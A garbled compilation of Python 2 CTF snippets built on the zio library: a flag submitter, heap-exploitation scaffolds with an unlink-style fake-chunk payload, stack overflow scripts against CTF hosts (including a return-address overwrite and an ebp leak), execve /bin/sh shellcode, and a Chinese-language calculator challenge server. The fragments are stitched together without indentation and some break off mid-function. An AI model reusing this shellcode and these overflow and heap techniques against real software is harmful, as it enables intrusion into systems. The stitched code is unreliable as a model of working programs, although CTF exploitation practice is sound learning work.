def submit_flag(flag):
# flags are now submitted using one connection per flag
# whilst testing systems allow submitting multiple flags
# during one connection. TODO
log.debug("Submitting flag %s", flag)
try_number = 0
while True:
try_number += 1
try:
connection = zio.zio(
(HOST, PORT), print_read=False, print_write=False)
break
except:
log.debug("Unsuccessful connection attempt")
if try_number % 10 == 0:
log.error("%d unsuccessful connections in a row", try_number)
time.sleep(0.3)
connection.read_line() # jury greeting
connection.write(flag + "\n")
response = connection.read().strip()
connection.close()
log.debug("Response for %s: '%s'", flag, response)
for verdict, message in VERDICT_MESSAGES:
if message in response:
return verdict
def run(self):
io = zio.zio(self.__zio_target, print_read=self.__zio_print_read, print_write=self.__zio_print_write, timeout=self.__zio_timeout)
self.recv_welcome(io)
last_ques = ''
last_ans = ''
for level in self.level_list:
for i in xrange(level.round):
this_ques, this_ans = level.run(io)
level.write_cache(last_ques, last_ans)
last_ques = this_ques
last_ans = this_ans
io.interact()
def show():
global io
io.writeline('4')
def add_tv(name, season=0, rating=0, intro='A'):
global io
io.writelines(['1', name, str(season), str(rating), intro])
def remove(name):
global io
io.writelines(['3', name])
io = zio.zio(TARGET)
add_tv('A')
add_tv('B')
add_tv('A')
add_tv('B')
io.interact()
# remove('A')
# io.read_until_timeout()
# show()
# io.read_until('TV <')
# remove(io.read_until('> season')[:-len('> season')])
# raw_input()
#!/usr/bin/env python
# encoding:utf-8
import zio
payload = "A" * 128
Io = zio.zio("./a.out")
Io.writeline(payload)
Io.interact()
import zio
import struct
import time
#T = ("127.0.0.1",4444)
T = ("library.polictf.it",80)
io = zio.zio(T)
off_addr_ebp = -35
#set offset
io.read_until("exit")
io.write("a\n")
io.read_until("title:")
io.write(str(off_addr_ebp-1) + "\n")
payload = "AAAA"
io.write(payload + "\n")
#get addr
io.read_until("exit")
io.write("r\n")
io.read_until("read:")
io.write("1\n")
io.read(1) #read 1 byte here
res = io.read(4)
addr_ebp = struct.unpack("<I",res)[0]
print "\nebp:",hex(addr_ebp)
#addr of buffer
addr_buf = addr_ebp - 1037
print 'addr buf:',hex(addr_buf)
def edit(index, size=None, buf=None):
global io
if buf is None:
io.writelines(['3', str(index), str(size)])
io.write(NOPS(size))
else:
io.writelines(['3', str(index), str(len(buf))])
io.write(buf)
def delete(index):
global io
io.writelines(['4', str(index)])
io = zio.zio(TARGET)
new(0x100) # id = 0
new(0x100) # id = 1
new(0x10) # id = 2
new(0x10) # id = 3
new(0x200) # id = 4
payload = zio.l64(0x100)
payload += zio.l64(0x100)
payload += zio.l64(0x6016C0 + 0x28 - 0x18)
payload += zio.l64(0x6016C0 + 0x28 - 0x10)
payload += zio.l64(0) * 2
edit(1, buf=payload)
# raw_input()
import zio
junk = "AAAABBBBCCCCDDDDEEEEFFFFGGGG"
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\xb0\x0b\x89\xe3\x31\xc9\x31\xd2\xcd\x80"
Io = zio.zio("./main")
address = zio.l32(int(Io.readline().replace("Address : 0x", "")[0:8], 16))
payload = (shellcode + junk)[0:len(junk)] + address
Io.interact()
import zio
junk = "A" * 0x88
address = "\x96\x05\x40\x00\x00\x00\x00"
payload = junk + address
# Io = zio.zio("./level0")
Io = zio.zio(("pwn2.jarvisoj.com", 9881))
Io.write(payload)
Io.interact()
def handle(self):
print 'get connection from',self.client_address
self.request.settimeout(10)
self.wfile.write('TOKEN=')
self.token = self.rfile.readline().strip()
print 'TOKEN='+self.token
if '' == self.token:
self.wfile.write('\n\nwrong token\n')
return
print 'serving team {'+self.token+'} from ',self.client_address
self.request.settimeout(50)
self.wfile.write('GeruzoniAnsasu的舍友M大大最近去旁听了编译原理,回来问了一个问题把大家都难住了:\n')
#sleep(0.6)
self.wfile.write('为啥处理语法树的时候要有人为规定的优先级?\n')
#sleep(0.6)
self.wfile.write('如果优先级重新定义的话……\n\n')
self.rfile.readline()
self.wfile.write('example: 2*4+5\n')
self.wfile.write(' (2*4)+5 = 13\n')
self.wfile.write(' 2*(4+5) = 18\n\n')
#sleep(0.6)
self.wfile.write('那么所有这些情况的结果和是多少呢?(31)\n')
if self.rfile.readline().strip() != '31':
return
self.wfile.write('\n\n先来熟悉熟悉吧:\n')
#sleep(0.8)
smps = (('1*2+3',10),('4-3+7',2),('9*3-5',4),('6+7*8',166),('15+3*8-7',255),('3*8+11+4',316))
for i in range(3):
t1 = time()
s,v = smps[randrange(6)]
self.wfile.write(s+' sum = ?\n')
ans = int(self.rfile.readline().strip())
t2 = time()
if ans != v or t2-t1 > 50:
self.wfile.write('噫……\n')
return
#sleep(0.5)
self.wfile.write('\n\n还可以,我感觉你已经理解意思了。\n')
#sleep(0.8)
self.wfile.write('现在让我们换一种表达方式,如下:\n\n')
self.wfile.write('6[2,5,10,9,3,34]++*-*\n')
self.wfile.write('答案159001\n\n')
#sleep(0.3)
self.wfile.write('以防数字太大,所有答案mod 1e9+7.\n')
self.rfile.readline()
#sleep(0.1)
self.wfile.write('那么,lv1,计时开始:)\n\n')
self.request.settimeout(self.TO_LV1)
#sleep(0.3)
self.wfile.write('2[0,10]- \n')
ans = int(self.rfile.readline().strip())
if ans != 999999997:
self.wfile.write('再想想\n')
return
seed(time())
sz_calc = ''
sz_send = ''
print '--LV1--'
for i in xrange(randrange(5,8)):#5到8组 LV1
break
n = randrange(8,18)#8到18个数
sz_calc = str(n)+'\n'
sz_send = str(n)
l = []
for j in xrange(n):
num = randrange(1e9+7)
sz_calc += str(num)+' '
l.append(num)
sz_calc += '\n'
sz_send += repr(l)
for j in xrange(n-1):
sign = ops[randrange(3)]
sz_calc += sign
sz_send += sign
io = zio.zio('./calc',print_read = lambda x:'',print_write = lambda x:'')
io.writeline(sz_calc)
right_ans = int(io.readline().strip())
print 'R->',right_ans
self.wfile.write(sz_send+'\n')
#continue
ans = int(self.rfile.readline().strip())
print '<-A',ans
if ans != right_ans:
return
io.close()
print '--LV2--'
self.wfile.write('可喜可贺!\nlv2,时限更严:)\n\n')#LV2
self.request.settimeout(self.TO_LV2)
for i in xrange(randrange(10,20)):#10到20组
n = randrange(12,30)#12到30个数
sz_calc = str(n)+'\n'
sz_send = str(n)
l = []
for j in xrange(n):
num = randrange(1e9+7)
sz_calc += str(num)+' '
l.append(num)
sz_calc += '\n'
sz_send += repr(l)
for j in xrange(n-1):
sign = ops[randrange(3)]
sz_calc += sign
sz_send += sign
io = zio.zio('./calc',print_read = lambda x:'',print_write = lambda x:'')
io.writeline(sz_calc)
right_ans = int(io.readline().strip())
print 'R->',right_ans
self.wfile.write(sz_send+'\n')
#continue
ans = int(self.rfile.readline().strip())
print '<-A',ans
if ans != right_ans:
print ':('
return
io.close()
print '--LV3--'
self.wfile.write('有希望看到flag了!\nlv3,证明你是精英的时候:)\n\n')#LV3
self.request.settimeout(self.TO_LV3)
for i in xrange(10):#30组
n = randrange(90,150)#90到150个数
sz_calc = str(n)+'\n'
sz_send = str(n)
l = []
for j in xrange(n):
num = randrange(1e9+7)
sz_calc += str(num)+' '
l.append(num)
sz_calc += '\n'
sz_send += repr(l)
for j in xrange(n-1):
sign = ops[randrange(3)]
sz_calc += sign
sz_send += sign
io = zio.zio('./calc',print_read = lambda x:'',print_write = lambda x:'')
io.writeline(sz_calc)
right_ans = int(io.readline().strip())
print 'R->',right_ans
self.wfile.write(sz_send+'\n')
#continue
ans = int(self.rfile.readline().strip())
print '<-A',ans
if ans != right_ans:
return
io.close()
print '--LV4--'
self.wfile.write('\nINSANE!!\n\n')#LV4
self.request.settimeout(self.TO_LV4)
for i in xrange(2):
n = randrange(700,900)#700到900个数
sz_calc = str(n)+'\n'
sz_send = str(n)
l = []
for j in xrange(n):
num = randrange(1e9+7)
sz_calc += str(num)+' '
l.append(num)
sz_calc += '\n'
sz_send += repr(l)
for j in xrange(n-1):
sign = ops[randrange(3)]
sz_calc += sign
sz_send += sign
io = zio.zio('./calc',print_read = lambda x:'',print_write = lambda x:'')
io.writeline(sz_calc)
right_ans = int(io.readline().strip())
print 'R->',right_ans
self.wfile.write(sz_send+'\n')
#continue
ans = int(self.rfile.readline().strip())
print '<-A',ans
if ans != right_ans:
return
io.close()
self.wfile.write('here you got the flag, but i removed some code from original file.\n')
print 'team {%s} got the flag.' % self.token
